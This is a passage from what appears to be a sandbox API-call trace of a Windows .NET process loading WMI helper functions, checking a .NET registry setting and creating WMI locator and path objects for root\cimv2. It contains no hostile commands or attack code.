lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x38e17c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectTextmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 13 [0193.821] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetObjectText") returned 0x6d5f77f0 [0193.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x38e178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClassmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 17 [0193.850] GetProcAddress (hModule=0x6d5f0000, lpProcName="SpawnDerivedClass") returned 0x6d5f7e80 [0193.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x38e17c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstancemnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 13 [0193.860] GetProcAddress (hModule=0x6d5f0000, lpProcName="SpawnInstance") returned 0x6d5f7eb0 [0193.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x38e180, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTomnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 9 [0193.861] GetProcAddress (hModule=0x6d5f0000, lpProcName="CompareTo") returned 0x6d5f7020 [0193.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x38e178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOriginmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 17 [0193.873] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetPropertyOrigin") returned 0x6d5f7880 [0193.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x38e17c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFrom»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 12 [0193.887] GetProcAddress (hModule=0x6d5f0000, lpProcName="InheritsFrom") returned 0x6d5f7900 [0193.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x38e180, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 9 [0193.892] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetMethod") returned 0x6d5f7730 [0193.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x38e180, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethodmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 9 [0193.907] GetProcAddress (hModule=0x6d5f0000, lpProcName="PutMethod") returned 0x6d5f7bf0 [0193.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x38e17c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethod»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 12 [0193.947] GetProcAddress (hModule=0x6d5f0000, lpProcName="DeleteMethod") returned 0x6d5f7320 [0193.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x38e174, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumerationnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 22 [0193.949] GetProcAddress (hModule=0x6d5f0000, lpProcName="BeginMethodEnumeration") returned 0x6d5f6e50 [0193.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x38e180, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethodnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 10 [0193.950] GetProcAddress (hModule=0x6d5f0000, lpProcName="NextMethod") returned 0x6d5f79d0 [0194.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x38e174, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumeration»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 20 [0194.028] GetProcAddress (hModule=0x6d5f0000, lpProcName="EndMethodEnumeration") returned 0x6d5f73e0 [0194.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x38e174, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSetmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 21 [0194.031] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetMethodQualifierSet") returned 0x6d5f7790 [0194.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x38e178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0194.033] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetMethodOrigin") returned 0x6d5f7760 [0194.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x38e178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Get»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 16 [0194.035] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_Get") returned 0x6d5f7c80 [0194.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x38e178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Put»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 16 [0194.053] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_Put") returned 0x6d5f7d10 [0194.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x38e174, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0194.094] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_Delete") returned 0x6d5f7c40 [0194.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x38e174, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNamesmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 21 [0194.096] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_GetNames") returned 0x6d5f7cb0 [0194.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x38e16c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumerationmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 29 [0194.112] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x6d5f7c20 [0194.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x38e178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_NextmnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 17 [0194.113] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_Next") returned 0x6d5f7ce0 [0194.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x38e16c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0194.130] GetProcAddress (hModule=0x6d5f0000, lpProcName="QualifierSet_EndEnumeration") returned 0x6d5f7c60 [0194.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x38e170, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0194.132] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetCurrentApartmentType") returned 0x6d5f78e0 [0194.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x38e174, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStub»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 20 [0194.141] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetDemultiplexedStub") returned 0x6d5f75f0 [0194.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x38e174, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmimnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 21 [0194.155] GetProcAddress (hModule=0x6d5f0000, lpProcName="CreateInstanceEnumWmi") returned 0x6d5f7230 [0194.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x38e178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWminmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 18 [0194.200] GetProcAddress (hModule=0x6d5f0000, lpProcName="CreateClassEnumWmi") returned 0x6d5f7160 [0194.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x38e17c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmi»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 12 [0194.202] GetProcAddress (hModule=0x6d5f0000, lpProcName="ExecQueryWmi") returned 0x6d5f74e0 [0194.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x38e170, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmi»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 24 [0194.313] GetProcAddress (hModule=0x6d5f0000, lpProcName="ExecNotificationQueryWmi") returned 0x6d5f7400 [0194.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x38e17c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWminmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 14 [0194.315] GetProcAddress (hModule=0x6d5f0000, lpProcName="PutInstanceWmi") returned 0x6d5f7b10 [0194.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x38e17c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0194.372] GetProcAddress (hModule=0x6d5f0000, lpProcName="PutClassWmi") returned 0x6d5f7a30 [0194.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x38e170, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObject»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 24 [0194.375] GetProcAddress (hModule=0x6d5f0000, lpProcName="CloneEnumWbemClassObject") returned 0x6d5f6f50 [0194.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x38e178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmi»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 16 [0194.384] GetProcAddress (hModule=0x6d5f0000, lpProcName="ConnectServerWmi") returned 0x6d5f7050 [0194.391] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e130 | out: phkResult=0x38e130*=0x558) returned 0x0 [0194.391] RegQueryValueExW (in: hKey=0x558, lpValueName="WMIDisableCOMSecurity", lpReserved=0x0, lpType=0x38e14c, lpData=0x0, lpcbData=0x38e148*=0x0 | out: lpType=0x38e14c*=0x0, lpData=0x0, lpcbData=0x38e148*=0x0) returned 0x2 [0194.391] RegCloseKey (hKey=0x558) returned 0x0 [0194.392] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38e9c8 | out: pAptType=0x38e9c8*=1) returned 0x0 [0194.394] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x2667f28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38e9cc | out: ppvObject=0x38e9cc*=0x0) returned 0x80004002 [0194.395] IUnknown:Release (This=0x6d0cac) returned 0x0 [0194.416] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x38e61c | out: lpiid=0x38e61c) returned 0x0 [0194.418] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e338 | out: ppv=0x38e338*=0x5479320) returned 0x0 [0195.337] WbemDefPath:IUnknown:QueryInterface (in: This=0x5479320, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e550 | out: ppvObject=0x38e550*=0x0) returned 0x80004002 [0195.337] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5479320, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e55c | out: ppvObject=0x38e55c*=0x53abde8) returned 0x0 [0195.339] WbemDefPath:IUnknown:Release (This=0x5479320) returned 0x0 [0195.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e17c | out: ppvObject=0x38e17c*=0x53abde8) returned 0x0 [0195.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e130 | out: ppvObject=0x38e130*=0x0) returned 0x80004002 [0195.345] WbemDefPath:IUnknown:AddRef (This=0x53abde8) returned 0x3 [0195.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38da8c | out: ppvObject=0x38da8c*=0x0) returned 0x80004002 [0195.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38da3c | out: ppvObject=0x38da3c*=0x0) returned 0x80004002 [0195.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38da48 | out: ppvObject=0x38da48*=0x5479330) returned 0x0 [0195.345] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5479330, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38da50 | out: pCid=0x38da50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.345] WbemDefPath:IUnknown:Release (This=0x5479330) returned 0x3 [0195.346] CoGetContextToken (in: pToken=0x38daa8 | out: pToken=0x38daa8) returned 0x0 [0195.347] CoGetContextToken (in: pToken=0x38debc | out: pToken=0x38debc) returned 0x0 [0195.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0195.347] WbemDefPath:IUnknown:Release (This=0x53abde8) returned 0x2 [0195.347] WbemDefPath:IUnknown:Release (This=0x53abde8) returned 0x1 [0195.347] CoGetContextToken (in: pToken=0x38e854 | out: pToken=0x38e854) returned 0x0 [0195.347] CoGetContextToken (in: pToken=0x38e7b4 | out: pToken=0x38e7b4) returned 0x0 [0195.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abde8, riid=0x38e884*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38e880 | out: ppvObject=0x38e880*=0x53abde8) returned 0x0 [0195.348] WbemDefPath:IUnknown:AddRef (This=0x53abde8) returned 0x3 [0195.348] WbemDefPath:IUnknown:Release (This=0x53abde8) returned 0x2 [0195.349] WbemDefPath:IWbemPath:SetText (This=0x53abde8, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0195.350] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f0fc | out: puCount=0x38f0fc*=0x2) returned 0x0 [0195.350] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0f8*=0x0, pszText=0x0 | out: puBuffLength=0x38f0f8*=0xf, pszText=0x0) returned 0x0 [0195.350] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f0f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.351] CoGetObjectContext (in: riid=0x2667f40*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f084 | out: ppv=0x38f084*=0x6d0cac) returned 0x0 [0195.351] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f07c | out: pAptType=0x38f07c*=1) returned 0x0 [0195.352] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x2667f28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f080 | out: ppvObject=0x38f080*=0x0) returned 0x80004002 [0195.352] IUnknown:Release (This=0x6d0cac) returned 0x0 [0195.352] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x38ef84 | out: lpiid=0x38ef84) returned 0x0 [0195.353] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38eca0 | out: ppv=0x38eca0*=0x5477d48) returned 0x0 [0195.558] WbemLocator:IUnknown:QueryInterface (in: This=0x5477d48, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eeb8 | out: ppvObject=0x38eeb8*=0x0) returned 0x80004002 [0195.558] WbemLocator:IClassFactory:CreateInstance (in: This=0x5477d48, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eec4 | out: ppvObject=0x38eec4*=0x5479360) returned 0x0 [0195.558] WbemLocator:IUnknown:Release (This=0x5477d48) returned 0x0 [0195.558] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eae4 | out: ppvObject=0x38eae4*=0x5479360) returned 0x0 [0195.559] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea98 | out: ppvObject=0x38ea98*=0x0) returned 0x80004002 [0195.559] WbemLocator:IUnknown:AddRef (This=0x5479360) returned 0x3 [0195.559] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e3f4 | out: ppvObject=0x38e3f4*=0x0) returned 0x80004002 [0195.559] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e3a4 | out: ppvObject=0x38e3a4*=0x0) returned 0x80004002 [0195.559] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3b0 | out: ppvObject=0x38e3b0*=0x0) returned 0x80004002 [0195.559] CoGetContextToken (in: pToken=0x38e410 | out: pToken=0x38e410) returned 0x0 [0195.560] CoGetObjectContext (in: riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5477d4c | out: ppv=0x5477d4c*=0x6d0ca0) returned 0x0 [0195.560] CoGetContextToken (in: pToken=0x38e824 | out: pToken=0x38e824) returned 0x0 [0195.560] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e8a4 | out: ppvObject=0x38e8a4*=0x0) returned 0x80004002 [0195.560] WbemLocator:IUnknown:Release (This=0x5479360) returned 0x2 [0195.560] WbemLocator:IUnknown:Release (This=0x5479360) returned 0x1 [0195.560] CoGetContextToken (in: pToken=0x38eea4 | out: pToken=0x38eea4) returned 0x0 [0195.560] CoGetContextToken (in: pToken=0x38ee04 | out: pToken=0x38ee04) returned 0x0 [0195.560] WbemLocator:IUnknown:QueryInterface (in: This=0x5479360, riid=0x38eed4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38eed0 | out: ppvObject=0x38eed0*=0x5479360) returned 0x0 [0195.560] WbemLocator:IUnknown:AddRef (This=0x5479360) returned 0x3 [0195.560] WbemLocator:IUnknown:Release (This=0x5479360) returned 0x2 [0195.561] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0195.561] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0xf, pszText=0x0) returned 0x0 [0195.561] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38f05c*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f05c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.562] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38ef0c | out: ppv=0x38ef0c*=0x5479370) returned 